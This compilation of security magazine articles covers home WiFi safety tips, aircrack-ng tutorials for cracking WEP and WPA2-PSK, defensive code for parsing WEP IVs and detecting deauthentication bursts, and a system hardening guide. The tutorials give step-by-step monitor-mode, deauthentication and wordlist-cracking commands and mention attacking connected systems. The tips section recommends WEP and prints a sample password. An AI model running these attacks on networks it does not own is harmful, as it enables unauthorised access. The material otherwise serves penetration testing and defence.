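    this bit set is often a known device hiding its hardware address."""
    return bool(int(normalize_mac(mac)[:2], 16) & 0x02)


def parse_leases(text):
    """One dict per lease line, with the MAC already normalized."""
    rows = []
    for line in text.strip().splitlines():
        expiry, mac, ip, host = line.split()
        rows.append({"mac": normalize_mac(mac), "ip": ip, "host": host})
    return rows


def unknown_devices(rows, my_devices):
    """Rows whose MAC is not on your list, annotated with the randomized flag."""
    allow = {normalize_mac(m) for m in my_devices}
    return [dict(row, randomized=is_locally_administered(row["mac"]))
            for row in rows if row["mac"] not in allow]


if __name__ == "__main__":
    for dev in unknown_devices(parse_leases(LEASES), MY_DEVICES):
        print(dev)
```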


Now, how to keep your WIFI safe from being hacked

Don't let strangers use your network


Password-protect your wireless connection. Turn on WEP (wired equivalency privacy) or WPA (Wi-Fi protected
access) on all of your devices, including your router, your media center, and your Microsoft Xbox entertainment
system.
• Make your password unique (like P@55w0rd@09)
• Use WPA2 password encryption, which offers the best security
• Keep changing your password every 15 days or at least within a month
• Keep your WPS PIN locked

Move your wireless router
Place the wireless access point away from windows and keep it near the center of your house to decrease the signal
strength outside of the intended coverage area.

Defend your computer


Keep all software current (including your web browser) with automatic updates. Make sure that your firewall is turned
on and use antivirus and antispyware software from a source that you trust.

Keep Your Logins Secure


It's easy to disable the feature in your browser that automatically fills in logins and passwords. In a public place, do
so as a best practice.

Check the internet/downloading speed


When you are downloading something, check whether the download speed is low: it may be that your WIFI is being
used by others, and the best way to check is an online internet speed test.

So here we go with WIFI hacking and mitigation. Keep learning and Be Safe.

Note: Above article is for educational and security testing purpose only, to check your WIFI router’s vulnerability.


about the author

Pprasoon Nigam

Pprasoon Nigam has been working as a Security Consultant for the past few years in many large organizations. He has been rewarded as an "Ethical Hacker" and has also been working on countermeasures against hacking for the last few years to make people aware of hacking.

References
• http://prasoon-nigam.blogspot.in/2012/01/safe-ur-wifi-from-being-hacked.html
• http://www.dummies.com/computers/computer-networking/wireless/wireless-security-protocols-wep-wpa-and-wpa2/
• https://en.wikipedia.org

WIRELESS HACKING
WITH AIRCRACK-NG

by Anthony Caldwell
Wireless Hacking With Aircrack-ng

What you will learn

How to use the Aircrack-ng tool.

Aircrack-ng is a widely used tool with capabilities to crack WEP and WPA.

Introduction
Given our increasing need to stay connected via social media and email, and therefore to have access to the Internet, the
availability of free, open WiFi access points in institutions, shops and, in some areas, city-wide has become the norm.
We don't give a second thought to using a free WiFi spot in a coffee shop, since it lets us stay connected. But what
about our home? While you may have followed our best advice to select a password for your router and implemented
WPA/WPA2 encryption, it is possible, with help, to access these too. In this article, we outline the use of a tool called
'Aircrack-ng', used by security professionals to access secured WiFi.

Cracking WEP Versus WPA


The approaches used to crack the WPA/WPA2 pre-shared key and WEP differ significantly. WEP cracking can leverage
statistical methods to speed up the process, but only brute force techniques work against WPA/WPA2. In WPA/WPA2,
the key is not static, so collecting initialization vectors (IVs), unlike in WEP, does not speed up the attack. The
handshake between the access point and a client does reveal some information, though, at the moment the client
connects to the network. It should be noted that a pre-shared key can be from 8 to 63 characters in length, making it
impossible to crack the pre-shared key (Aircrack-ng, 2010).

Authentication is basically the same between WPA and WPA2. The objective is to capture the WPA/WPA2
authentication handshake and then use aircrack-ng to crack the pre-shared key.

Cracking WEP encryption


WEP, or Wired Equivalent Privacy, is an 802.11 standard used for encryption in Wireless LANs (IEEE, 2012). WEP
has two main functions, ensuring that traffic cannot be viewed by untrusted parties and preventing unauthorized
access to a network. The algorithm itself uses the RC4 cipher and 64-bit/128-bit keys to encrypt and decrypt and
ensure the integrity of the packets. Weaknesses in the key scheduling of the RC4 algorithm (Fluhrer, Mantin, &
Shamir, 2001) were first identified in 2001. Although RC4 is still secure when used with recommended methods, the
researchers discovered that when using RC4 with WEP that it is significantly weakened. WEP’s flaws include lack of
packet replay protection, weak packet integrity checks and the fact that it is possible to recover the key from a
collection of captured packets. Each WEP packet must be sent with a 4-byte header containing a one byte index
number and a three byte IV. WEP key recovery relies on capturing a large number of unique IV values.
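The 4-byte header just described, and the reason a "large number of unique IV values" is so easy to collect, can be shown with a few lines of code. The example below is added and is not from the article: it parses the IV and key index out of constructed WEP frame bodies, counts distinct IVs and reuse, and computes the birthday bound for the 24-bit IV space; the frame layout (3-byte IV, then a byte whose top two bits hold the key index) is the WEP one, and the helper names are the author's own.

```python
# Added example (not from the article): parse the 4-byte WEP header (3-byte IV
# plus a byte whose top two bits carry the key index) and measure how fast a
# capture exhausts the 24-bit IV space.  Frames here are constructed; in a real
# capture the IV header follows the 802.11 MAC header of each data frame.
import math

IV_SPACE = 2 ** 24          # a 3-byte IV can only take 16,777,216 values


def parse_wep_header(frame_body):
    """Return (iv_bytes, key_index) from the start of an encrypted frame body."""
    if len(frame_body) < 4:
        raise ValueError("frame body shorter than the WEP IV header")
    iv = bytes(frame_body[:3])
    key_index = frame_body[3] >> 6           # bits 6-7; bits 0-5 are padding
    return iv, key_index


def make_frame(iv_value, key_index=0, payload=b"\x00" * 8):
    """Constructed WEP frame body: IV header followed by an opaque payload."""
    return iv_value.to_bytes(3, "big") + bytes([(key_index & 0x03) << 6]) + payload


def iv_report(frames):
    """Count distinct IVs and IV reuse (the figures airodump-ng's Data column
    tracks) plus how much of the IV space the capture has already covered."""
    counts = {}
    for frame in frames:
        iv, _ = parse_wep_header(frame)
        counts[iv] = counts.get(iv, 0) + 1
    reused = sum(n - 1 for n in counts.values())
    return {"frames": len(frames), "unique_ivs": len(counts),
            "reused": reused, "space_fraction": len(counts) / IV_SPACE}


def frames_until_collision(probability=0.5):
    """Birthday bound: number of frames after which some IV has repeated with
    the given probability.  For a 24-bit IV this is a few thousand frames,
    which is why IV reuse on a busy WEP network is a certainty, not a risk."""
    return math.sqrt(2 * IV_SPACE * math.log(1 / (1 - probability)))


if __name__ == "__main__":
    capture = [make_frame(i) for i in range(10)] + [make_frame(3)]
    print(iv_report(capture))
    print(round(frames_until_collision()))
```

A reused IV with the same key means the same RC4 keystream was used twice, which is the flaw the Fluhrer, Mantin and Shamir work builds on; the report's reused counter is the metric to watch when auditing any WEP network that is still running.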

Steps to Crack Wireless Signals using Aircrack-ng


Aircrack-ng offers a lot of helpful steps to use their tool. The first step is to start the wireless interface in monitor mode
(Aircrack, 2010) so put your card into what is called monitor mode. Monitor mode is the mode whereby your card can
listen to every packet in the air. Normally, your card will only “hear” packets addressed to you.


‘airmon-ng’
By hearing every packet, we can later capture the WPA/WPA2 4-way handshake. As well, it will allow us to optionally
deauthenticate a wireless client in a later step. The airmon-ng tool that comes packaged with the Aircrack-ng suite of
tools can be used to place a wireless adapter into monitor mode. To identify the wireless cards on the system run the
airmon-ng command with no arguments.

Figure 1 - Wireless Card

We can see in the example above that there is one wireless adapter called 'wlan0' associated with the physical interface
phy0. Next, to place this interface in 'monitor mode', simply run the command,

‘airmon-ng start wlan0’

Figure 2 - Wireless Card in Monitor Mode

The airmon-ng tool will create a monitor mode interface associated with the physical device used by the interface with
the name mon0.

The next step is to select a suitable access point (AP) or router from which to capture traffic. This can be done using
the Airodump-ng script with the specified interface.

‘airodump-ng’

Figure 3 - Airodump-ng Tool Capturing 802.11 Frames

Airodump-ng provides a great deal of information described in the table below:


Header   Detail
BSSID    MAC address of the router/AP
PWR      Signal strength
CH       Channel the AP is running on
Data     Initialization vectors (IVs) captured
ENC      Encryption used
ESSID    Name of the AP

The field that we are most interested in is Data or IV, as discussed, but many IVs are required. Once the AP has been
identified, the next step is to capture the packets and place them in a file for analysis. We use Airodump-ng, specifying
the channel, file to write to and the interface.

Figure 4 - Airodump-ng Captured Files

Although the frames are being captured we need to speed up the process because we need a large amount of IVs, and
this can be done by performing an ARP replay attack.

Figure 5 - ARP Replay Attack

Once the attack is initiated, the data/IV column will rise at a much quicker rate. A combination of aircrack-ng and the
capture file may now be used to launch the attack.

Figure 6 - Aircrack-ng WEP Password Crack

If the program does not have enough IVs, this may take repeated attempts. A successful crack will return the password
in hex form.

Figure 7 - WEP Key Found

Cracking WPA-PSK encryption


This time, instead of trying to increase the data (IVs) as in WEP cracking, the objective is to capture a 4-way
handshake. It should be noted that in order for this attack to work, at least one client needs to be connected. The
reason for this is that to create a 4-way handshake the client needs to be first disconnected and then reconnected.
De-authenticating a client is done using,

‘aireplay-ng’

Figure 8 - De-authenticating a Client

With a successful WPA handshake the top right of the airodump-ng terminal looks like below,

Figure 9 - WPA Handshake Captured


In this case, we brute force the password with aircrack-ng in combination with a password list.

'aircrack-ng -w wordlist name-01.cap'

Figure 10 - BruteForce PSK

A penetration tester would use a combination of dictionary, mutated and compromised password lists.

Conclusion
As useful as the Aircrack-ng tool is in cracking wireless signals, it is a job that requires some patience and technical
ability and ultimately, if the password is not in your dictionary, it will not be found by Aircrack-ng either. Therefore,
the best advice is to select a better password or, better yet, passphrase.


about the author

Anthony Caldwell

Anthony Caldwell holds CEH and SSCP certifications, works as an application security analyst and independent security researcher.

References

• Aircrack-ng (2010). Available at https://www.aircrack-ng.org, retrieved 07/03/2017
• Fluhrer, S., Mantin, I., Shamir, A., (2001). Weaknesses in the key scheduling algorithm of RC4. In Eighth Annual Workshop on Selected Areas in Cryptography, Toronto, Canada, Aug. 2001.
• IEEE (2012). IEEE 802.11 Wireless LANs. Available at http://standards.ieee.org/getieee802/download/802.11-2012.pdf, retrieved 16/03/2017
• Kali (2016). Available at https://www.kali.org/downloads, retrieved 07/03/2017

HACKING WPA2-PSK
WITH KALI LINUX

by Uche Akajiuba
Hacking WPA2-PSK With Kali Linux

A wireless network is a network that uses radio waves to connect computers and other like devices together. The
implementation is done at the physical layer (Layer 1) of the OSI model.

WPA2 (Wi-Fi Protected Access) is a wireless security protocol that makes use of AES encryption and CCMP, a
TKIP replacement. It is stronger than the other wireless security protocols (WEP, WPA).

WPA2 pre-shared keys use passphrases. This is the weakness I will exploit to crack a WPA2 protected network and
gain access to it. Doing so requires software and hardware resources, and patience. The success of such attacks can
also depend on how active the users of the target network are. We are going to take a step-by-step look at
how you can break WPA2 using Kali Linux.

Our attack tool is the aircrack suite of tools in Kali Linux and we will employ the sniffing method; this involves
intercepting packets as they are transmitted over a network. If you feel you have the necessary skills, let’s begin:

These are things that you’ll need:

● A successful install of Kali Linux (which you can easily obtain).

● A wireless adapter capable of injection/monitor mode. Some computers have network cards capable of this from
the factory.

● Be within the target network’s radius.

● A wordlist to attempt to “crack” the password once it has been captured.

● Time and patience.

If you have these, then roll up your sleeves and let’s see how secure your network is!

Important notice: Hacking into anyone’s Wi-Fi without permission is considered an illegal act or crime in most
countries. We are performing this tutorial for the sake of penetration testing, hacking to become more secure, and I’m
using my own test network and router.

Step 1:

Open a terminal and find the name of your wireless adapter by typing iwconfig. Check the result (here my wireless adapter is ‘wlan0’).


Your computer has a number of network adapters, so to scan with one, you need to know its name. There are basically the following things that you need to know:

● lo - loopback. Not important currently.
● eth - Ethernet.
● wlan - This is what we want. Note the suffix associated.

Step 2:

Enable Monitor Mode

We use a tool called airmon-ng to create a virtual interface.

Type airmon-ng start followed by the interface name of your wireless card. Mine is wlan0, so my command would
be: airmon-ng start wlan0.

Here our newly created virtual interface is called wlan0mon.

Step 3:

Capturing Packets.


We’ll use airodump-ng to capture packets in the air; this tool gathers data from all wireless packets within our reach. To start it, type airodump-ng followed by the name of the new monitor interface (wlan0mon). Airodump-ng will now list all of the wireless networks, and a lot of useful information about them.

We will locate a network to hack (ensure that you hack only your own network or a network you have permission to hack). Once you’ve spotted your network on the ever-populating list, hit Ctrl + C on your keyboard to stop the process. Note the channel of your target network.

Our test network is “mask”.

You can also force the wireless card to scan and report all wireless networks in the vicinity using this command:


As you can see from the figure above, our target network (MASK) is also displayed.

Focus on the target network

Our next step is to focus our efforts on “mask”, and capture critical data from it. We need the BSSID and channel to do
this. Let's open another terminal and type:

airodump-ng --bssid [BSSID of mask] -c [channel] --write [file you want to write to] [interface]


As you can see in the screenshot above, we're now focusing on capturing data from one AP/router with an ESSID of
Mask on channel 11.

Capture the handshake

We will leave the airodump-ng screen open so it tells us when we have a WPA2 handshake. In order to capture the encrypted password, we need a client to authenticate against the AP/router. We need to catch a user in the act of authenticating to get a valid capture. Airodump-ng displays a handshake confirmation in the upper right hand corner of the screen when it captures a valid handshake.

We can also de-authenticate clients (kick them off); their systems will automatically re-authenticate, whereby we can grab their encrypted password in the 4-way handshake process.

I will show you the two scenarios:

1. Waiting

What we’re really doing now is waiting for a device to connect. Once this happens, we get a handshake as shown below:


2. Force re-authentication
I really don’t like waiting for a new device to connect; that’s not what impatient hackers do. We’re going to use another tool that belongs to the aircrack suite, called aireplay-ng, to achieve this. Instead of waiting for a device to connect, we will use this tool to force an already connected device to reconnect by sending deauthentication (deauth) packets to the client, thereby making it reconnect to the network.

Here we have a client already connected. Let's open another terminal and type:

● aireplay-ng --deauth [no. of deauth packets] -a [BSSID] [interface]

I had to send 50 deauth packets. You can try fewer.


…and we have our handshake!

Also, four files should show up in your chosen airodump directory. This is where the handshake is saved when captured, so don’t delete them!
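As an added defender-side example that is not part of this article: a small Python detector for the deauthentication burst just described, the kind of check a wireless IDS performs. It parses the fixed 24-byte 802.11 MAC header of captured management frames (assuming raw 802.11 frames with any radiotap header already stripped) and raises one alert when a BSSID emits a threshold number of deauthentication frames within a short window; the frames, MAC addresses, threshold and window below are constructed for the demo.

```python
"""Deauthentication-burst detector over raw 802.11 management frames (added example)."""
import struct
from collections import defaultdict, deque

MGMT_TYPE = 0            # frame-control type 0 = management
DEAUTH_SUBTYPE = 12      # management subtype 12 = deauthentication
BEACON_SUBTYPE = 8       # management subtype 8 = beacon
BROADCAST = "ff:ff:ff:ff:ff:ff"


def mac_to_str(raw):
    return ":".join(f"{b:02x}" for b in raw)


def mac_to_bytes(text):
    return bytes(int(part, 16) for part in text.split(":"))


def parse_mgmt_frame(frame):
    """Decode the fixed MAC header (assumes no radiotap header). None for non-management frames."""
    if len(frame) < 24:
        return None
    fc0 = frame[0]
    ftype = (fc0 >> 2) & 0x3       # bits 2-3 of the first frame-control byte: type
    subtype = (fc0 >> 4) & 0xF     # bits 4-7: subtype
    if ftype != MGMT_TYPE:
        return None
    info = {
        "subtype": subtype,
        "dst": mac_to_str(frame[4:10]),      # addr1: receiver
        "src": mac_to_str(frame[10:16]),     # addr2: transmitter
        "bssid": mac_to_str(frame[16:22]),   # addr3: BSSID
    }
    if subtype == DEAUTH_SUBTYPE and len(frame) >= 26:
        info["reason"] = struct.unpack_from("<H", frame, 24)[0]   # 2-byte reason code follows the header
    return info


class DeauthDetector:
    """Sliding-window counter: one alert when a BSSID sends `threshold` deauths within `window` seconds."""

    def __init__(self, threshold=10, window=5.0):
        self.threshold = threshold
        self.window = window
        self.recent = defaultdict(deque)   # bssid -> timestamps of recent deauth frames

    def observe(self, ts, frame):
        info = parse_mgmt_frame(frame)
        if info is None or info["subtype"] != DEAUTH_SUBTYPE:
            return None
        q = self.recent[info["bssid"]]
        q.append(ts)
        while q and ts - q[0] > self.window:   # drop timestamps that fell out of the window
            q.popleft()
        if len(q) == self.threshold:           # fire exactly once, when the count crosses the line
            return {"bssid": info["bssid"], "target": info["dst"],
                    "broadcast": info["dst"] == BROADCAST, "count": len(q),
                    "seconds": round(ts - q[0], 3), "reason": info.get("reason")}
        return None


def scan_capture(frames, threshold=10, window=5.0):
    """Run the detector over (timestamp, frame_bytes) pairs and return the alerts raised."""
    det = DeauthDetector(threshold, window)
    alerts = []
    for ts, frame in frames:
        alert = det.observe(ts, frame)
        if alert:
            alerts.append(alert)
    return alerts


# ---- constructed sample data (not a real capture) --------------------------------------
def build_mgmt_frame(subtype, dst, src, bssid, seq, body=b""):
    fc = bytes([(subtype << 4) | (MGMT_TYPE << 2), 0x00])   # version 0, no flags
    duration = (0x013A).to_bytes(2, "little")
    seq_ctrl = ((seq & 0x0FFF) << 4).to_bytes(2, "little")
    return fc + duration + mac_to_bytes(dst) + mac_to_bytes(src) + mac_to_bytes(bssid) + seq_ctrl + body


AP = "02:00:00:00:00:01"       # constructed BSSID (locally administered address)
CLIENT = "02:00:00:00:00:02"   # constructed client address


def sample_capture():
    frames, t = [], 0.0
    # background: a beacon every 100 ms and one legitimate deauth (reason 3, STA leaving) every 20 s
    for i in range(600):
        t = i * 0.1
        frames.append((t, build_mgmt_frame(BEACON_SUBTYPE, BROADCAST, AP, AP, i)))
        if i % 200 == 199:
            frames.append((t, build_mgmt_frame(DEAUTH_SUBTYPE, CLIENT, AP, AP, i, (3).to_bytes(2, "little"))))
    # burst: 50 deauths (the count used in the article) in about two seconds, reason code 7
    for i in range(50):
        frames.append((t + 10 + i * 0.04,
                       build_mgmt_frame(DEAUTH_SUBTYPE, CLIENT, AP, AP, 1000 + i, (7).to_bytes(2, "little"))))
    return frames


if __name__ == "__main__":
    for alert in scan_capture(sample_capture()):
        print(alert)
```

The lone deauths in the background never trip the window, while the burst raises a single alert naming the BSSID and the targeted client. The mitigation is 802.11w (Protected Management Frames), which authenticates deauthentication frames so forged ones are discarded by clients.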

Crack the Password

Here is the fun part! Now that we have the encrypted password in our file WPAPSKCRACK-01.cap, we can run that file
against aircrack-ng using a password file of our choice. I created a customized wordlist called wordlist.txt with crunch,
and will be using this to crack the encrypted password for mask. This wordlist is located on my desktop.

We'll now attempt to crack the password by opening another terminal and typing:

● aircrack-ng [captured packet file] -w [absolute path to our wordlist]

Cracking the password might take a long time depending on the size of the wordlist. Mine went very quickly.
Remember that this type of attack is only as good as your wordlist.

Here we are:


Proof Of Concept

Let’s try to login with the password we found:


As you can see, we are connected.

Note the channel (11).

Now that we are in the network, we can take the exploit further, as far as attacking the connected systems.

Enjoy!!


ABOUT THE AUTHOR

Uche Akajiuba

Uche is an award-winning Penetration Tester and Ethical Hacker with widespread experience in Computer Forensics, Scripting, Reverse Engineering and Information Security Management. He has a wealth of experience in several professional roles such as Security Governance, IT Risk, vulnerability management, cyber security, etc. A security researcher and strategist, Uche is currently an IT Security Engineer at Standard Bank Group Nigeria.

SYSTEM HARDENING TOOLS AND TIPS

by Sumit Kumar Soni

System Hardening Tools And Tips

Improve system security using simple hardening principles and measures

In the tug of war between attackers and defenders, the defenders need to secure the complete attack surface. In general, the attack surface comprises all possible entry points for an attacker. While the defenders or your system administrators need to mitigate every single existing attack vector, the attackers need to find just one unprotected vector.

Applications usually come with default settings, and these settings include things like a default username/password, making for an insecure default configuration. If an administrator does not change these configurations, criminals can easily compromise the application. By implementing system hardening, one can improve the effectiveness of protection and detection mechanisms many times over. The old saying "prevention is better than cure" applies not only to humans but also to systems.

What you will learn:

• What system hardening is
• The hardening process
• Resources available for hardening
• Windows tools to implement hardening
• Linux tools to implement hardening

What you should know:

• Basic knowledge of Linux and Windows
• Knowledge about systems administration

SYSTEM HARDENING DEFINITION

Hardening: As per NIST 800-53, hardening is configuring a host operating system and its applications to reduce the host's security weaknesses.
A hardened operating system is an operating system that has been configured or designed specifically to minimize the potential for compromise or attack.

GOALS OF HARDENING
FOR PREVENTION
1. Decrease the attack surface: This makes it more difficult for an attacker to attack the system.
2. Decrease available privileges: This limits the attacker’s ability to compromise highly privileged data.
3. Decrease available components and information: This reduces the software functions available to an attacker and makes it more cumbersome for an attacker to traverse further into the system. Ideally, attackers are stopped completely.
For example, if a system is supposed to host only a web server, hardening means closing all the other services that would be running by default on your OS, like network sharing, FTP, etc., which reduces the risk of attacks related to those services. Similarly, by making sure that the web server does not run with administrative/root privileges, we further reduce the risk of a complete system compromise in case of a successful attack on the web server.

FOR DETECTION
1. Increase the likelihood of detecting an attack on the system: Knowing your system well enough, in terms of its required components, is something you get as a by-product of implementing hardening. Knowledge of your system’s normal behavior helps you to detect any anomaly.
For example, this includes knowing which web server configuration files never change, or which network services are commonly used on a host. This knowledge is a perfect baseline and helps in detecting attacks through security monitoring. On a hardened system, the likelihood of successfully detecting an attack is significantly higher than on an unhardened system. Because you analyze the system and its attack surface thoroughly during the hardening process, you can spot and understand anomalies much better.
2. Improve future security posture: By providing a baseline of a machine that is considered hardened (for example, unneeded ports disabled by default, or only required services running on an as-needed basis), you avoid repeating on each system the work of deciding what to set. On a hardened system, it is possible to identify the last weak spot that is currently being abused by an attacker and to improve the future security posture.

If we know which configuration files of the web server should not change, and that only services like HTTP, DNS and DHCP are supposed to run on a system, we can easily identify any new service that has been installed or started by malicious programs, which leads to early detection of the compromise.

GUIDANCE FOR IMPLEMENTING HARDENING

HARDENING COMPONENTS
Every attacker is hoping for a badly configured component or a component with its default configuration, so instead of just sticking to the default configuration, you should consider what configuration may be the best fit for your environment and security needs and act accordingly. Depending on the actual component, such as a web server, recommendations for a secure configuration may exist. Ideally the vendor of that component has already put out some security configuration information or even a template. You can find many different sources on hardening for most of the well-known and widely used software components. A very good starting point may be the best practice guides and benchmarks from the Center for Internet Security (CIS).

CIS not only publishes hardening guides but also predefined configurations that you can use with certain tools. Other sources may be sector-specific, such as PCI-DSS, the Federal Information Security Management Act (FISMA), NIST 800-53 and others, depending on the industry or sector in which you are operating. The key takeaway is to apply hardening not only to a whole system but to consider hardening of the individual components as well.


HARDENING CONSIDERATIONS BEFORE IMPLEMENTING

Before starting with the hardening process itself, you should first think about the security goal that you want to reach with your hardening measures. Next you need to understand the functionality of your system, the state the system is in and the existing components, as well as the relations and dependencies between those components. After that, you will need to identify what exactly needs hardening and which measures to apply. Again, a well-defined baseline can be your greatest ally in completing this task. The last step is to estimate the cost of each measure and define the consequences of implementing and of not implementing it. If a defined measure is not suitable, you may need to rethink your target security level and go through the previous steps again.

HARDENING PROCESS
While undergoing hardening, a system may need to be isolated from its current environment in order to implement a measure. This may lower the security of the system temporarily. This could happen if, for example, the firewall has to be turned off to install a new service on the system. In the next step, you need to verify that the system is in a secure state, for example, free from malware. After the system is determined to be clean, it is advisable to create an inventory of all components. The next step is the most crucial within the process: the actual deployment, namely the application of hardening measures to your system. Most of these measures involve the reconfiguration of a component. It is highly advisable to check whether your measures took effect and how the attack surface changed.

In the next step, we recommend generating a snapshot of the current hardening baseline and using it as a template for comparison and monitoring. If the system was isolated for hardening, it is now time to return the system to its intended environment and reuse the baseline as a template for hardening other similar systems. Note that this process is meant as a rough guide covering the most critical steps; you may need to adapt it to your own needs.

DEFENCE IN DEPTH WITH HARDENING PROCESS

Figure 1: Correlation between layers in defense in depth & hardening impact


Defense in depth is an approach to increase security by applying multiple layers of defense rather than relying on a single protective mechanism. There is a correlation between the layers of the defense-in-depth principle and the impact of the hardening process on each layer.
Data: At the innermost (data) layer, many steps of the process apply. First we have to establish a valid state of the data, i.e. assure that the data is not corrupted. Next we create an inventory of our data to know which data is stored where and which permissions apply to it. Then we need to check the attack surface, for example, by reviewing the access permissions.
Application: Moving up, the next layer is the application layer, which includes nearly the same steps as the data layer except for the last step. We create a baseline and a template based on the installed and now securely configured applications. This can be done, for example, by exporting the application configuration. On this layer, creating an inventory includes information about the software, like version, vendor and other characteristics, for example whether the software updates automatically.
Host: The next layer is the host layer, which includes similar steps but again different measures in comparison to the lower layers. Creating an inventory for the host includes information about the installed operating system, which hardware is in place and what the current state of the system configuration is. Mechanisms for creating a template for a host can range from creating a copy of the host as a virtual machine to using specialized tools for the template task.
Network and Perimeter: The two uppermost layers are the network layer, with measures like isolating the system from the network with a firewall, and the perimeter layer, which goes a step further with measures such as physically isolating the system from other systems or, again, different types of network access control.

HARDENING GUIDES AND TOOLS

In this section, we will discuss some of the tools and guides you can use to harden your system. In order to give you some practical takeaways, we will take a closer look at resources and generic tools not tied to a specific platform, as well as tools specifically available for Windows and Linux. Let's start off with an overview map of the hardening guidelines out there and where you can get additional guidance for specific platforms.

General Sector: This includes generic guidance that is not specific to a platform and therefore contains abstract measures, as well as very sector-specific guidance, e.g. NIST 800-123 or NIST 800-53 and sector-specific compliance guidelines such as PCI-DSS and FISMA. This is a great starting point to get a feeling for what type of measures should be in place.
Cloud: Here you would be well advised to look for vendor-specific hardening guidelines tied to the cloud platform.
Operating Systems: At this point, we would like to introduce some well-known security configuration guidelines. The most significant and up-to-date guides for operating systems are from the Center for Internet Security. Other vendor-independent sources are, for example, those coming from governments, like the Defense Information Systems Agency with their Security Technical Implementation Guides, also known as STIGs. If you are using Windows, these system configuration guides, as well as the official Microsoft Windows system guide, will help you to harden a Windows system. Linux-specific hardening guides for major distributions and some secure configuration guidelines are available as well.


Applications: As we move to the applications, we can refer to the CIS guides and vendor-specific hardening guides, for example for web servers, databases or other applications.
Besides CIS and the vendor, it is advisable to look at the availability of best practices from third parties.

GENERAL TOOL
CIS-CAT
The CIS Configuration Assessment Tool (CIS-CAT) is a generic and mostly platform-independent tool for configuration assessment. It can verify the system configuration against the newest benchmark available for your platform. The application is written in Java. It is fed with a template file and can therefore also be used for hardening checks at scale. You can download it from https://learn.cisecurity.org/cis-cat-landing-page

Figure 2: CIS-CAT output

In addition to CIS-CAT, there is also a huge variety of commercial security auditing tools available which include checks of hardening measures and do vulnerability scanning. These kinds of tools assess the state of a system from the network according to certain configuration standards, such as the ones from CIS, and can also check against user-defined templates. However, only a small number of these security audit tools are available for free.

TOOLS FOR WINDOWS


MICROSOFT BASELINE SECURITY ANALYZER (MBSA)
MBSA can be used with the Windows operating system family. It comes with the ability to check that all available updates are installed and can also detect the most common Windows misconfigurations, such as guest accounts. It also includes checks for a lot of Microsoft applications. It can be run remotely to analyze multiple systems and also has a command line interface. Generated HTML reports can't help you with automating your monitoring.


You can download it from the Microsoft homepage (https://www.microsoft.com/en-ca/download/details.aspx?id=7558). When you open it, the first screen gives you the choice between scanning a single machine, scanning multiple machines or reviewing an already existing report. The screenshot shows the first option, which scans the local system.

Figure 3: MBSA system scan options


On the next screen, you can set the parameters of the report by specifying the system name or IP address, the report
name and what should be scanned.

Figure 4: MBSA system selection option

After selecting what should be scanned, we start the scan process. It may take a while to conclude but after the scan
finishes you can see a report with all the details. The header consists of the parameters of the scan followed by the
results which show information about the test. You can view more detailed information for every result in the report.


Figure 5: MBSA report

WINDOWS APPLOCKER
AppLocker is an application control solution for Microsoft Windows available in several Windows versions. It is turned off by default. AppLocker can be configured either through a snap-in in the Microsoft Management Console, through a PowerShell module or through Windows Group Policy. The second method allows management of AppLocker policies on a large number of clients within a Windows domain. The rule sets for AppLocker are separated into five default categories, each of which applies to a certain type of application. For example, DLL rules handle files with the .dll or .ocx extension and script rules manage certain scripting files. Aside from the general rules, it can generate rules for applications automatically. These rules should be reviewed and tested before being deployed on production systems. We can define two different behaviors for the rules: either you enforce a lockdown or you just log the violation and use the information for monitoring. Here is an example of how to block a script executing in your home directory, a common behavior exhibited by some malware.

To configure it using the Local Security Policy snap-in, under Application Control Policies we find the AppLocker entry; the first section shows a description of the service and some helpful information. If we scroll down, we find the settings to configure the enforcement of rules, which we need to block the .bat file from running.

Figure 6: Applocker from local security policy


We can create a new script rule with a right click.

Figure 7: Applocker create rule

Then we can set the action to deny and select a user to whom we want to apply the rule.

Figure 8: Applocker rule action and user selection

Now we need to select how to block a file; we choose path. You have the option to add exceptions to your rule. Here we
can see that a new rule was added to configure the rule enforcement tree.

Figure 9: Applocker rule enforcement

We can test the rule by clicking on the script. No command window or error message should open. If we try to execute the script from the command line, we can see that it is blocked by group policy.


Figure 10: Applocker rule blocks script execution

For more detailed information about what was blocked, we need to look at the system event log. In Event Viewer, navigate to the AppLocker entry and click on Script, where you can see the logged event about the script execution.

Figure 11: Applocker results in event viewer

ENHANCED MITIGATION EXPERIENCE TOOLKIT (EMET)

To be able to harden third-party applications running on Windows, even when no source code is available, Microsoft developed the Enhanced Mitigation Experience Toolkit (EMET). It actively applies countermeasures against common exploitation techniques to application binaries at runtime. Imagine having an older version of a web server binary that needs to stay in place for compatibility reasons; EMET lets you harden such a dangerous element. You can use EMET to harden nearly every Windows application at runtime. It can not only block exploitation attempts but also limit the actual impact they can have. There are many mitigations built into EMET which can be activated on a per-application basis. To run EMET, you only need a Windows installation and the .NET Framework 4.0. It can be integrated into domain GPOs to make a large deployment feasible. Initial compatibility testing is required, as some legacy applications may not run with some mitigations.

It is completely free. There are more free tools from Microsoft to improve system hardening, for example, BitLocker, which encrypts hard drives and increases the physical security of systems. Finally, Device Guard was introduced with Windows 10 and hardens the integrity of the system by using a combination of hardware features, such as the Trusted Platform Module, and software features, like code signing. Incorporating these OS tools can increase the protection of Windows platforms against different types of attackers.

TOOLS FOR LINUX


OPENSCAP
OpenSCAP is an implementation of the NIST SCAP (Security Content Automation Protocol) standard. SCAP is a standardized way to define system audit policies, among other things. The policies created for the tool can be used for a whole platform or for a single application. Along with auditing your platforms, you can also apply measures automatically. You can find good SCAP files and secure configuration guides in the National Checklist Program Repository. This is the U.S. Government repository of publicly available security checklists and provides guidance for the configuration of operating systems and applications.

It can be downloaded from https://www.open-scap.org/tools/openscap-base/

$ oscap xccdf eval --report report.html --profile xccdf_org.ssgproject.content_profile_pci-dss /usr/share/xml/scap/ssg/content/ssg-rhel7-ds.xml

With the command above, we run a PCI-DSS compliance test with OpenSCAP on a RHEL 7 system using a number of parameters. The first argument selects XCCDF as the source format. With the next, we say we want to do an evaluation; the next gives an output file for the report, and the second-to-last option selects the profile from the XCCDF document. The last argument is the XCCDF data stream file itself, where all policies and profiles for checking are defined. You can learn about other available parameters for running a scan by referring to the corresponding manual page.

With the above command, you can generate an HTML report. The header includes the text about the scan policy,
parameters and other interesting information.

Figure 12: OPENSCAP Report header


The report contains information about compliance to SCAP security benchmark and achieved score in the test results
and the results of every test. The results show how many rules were successful, how many failed and how many didn't
execute as expected.

Figure 13: OPENSCAP Report Compliance and scoring


The report additionally shows the impact of the failed rules, categorized with low, medium and high severity, and the
score at the end of this section in the report indicates the compliance state of the system against the policy.

Figure 14: OPENSCAP Report severity


The main part of the results includes the detailed result of every test, the test description and information about how the test was done and how to remediate your configuration if the test failed.

Figure 15: OPENSCAP Report test details
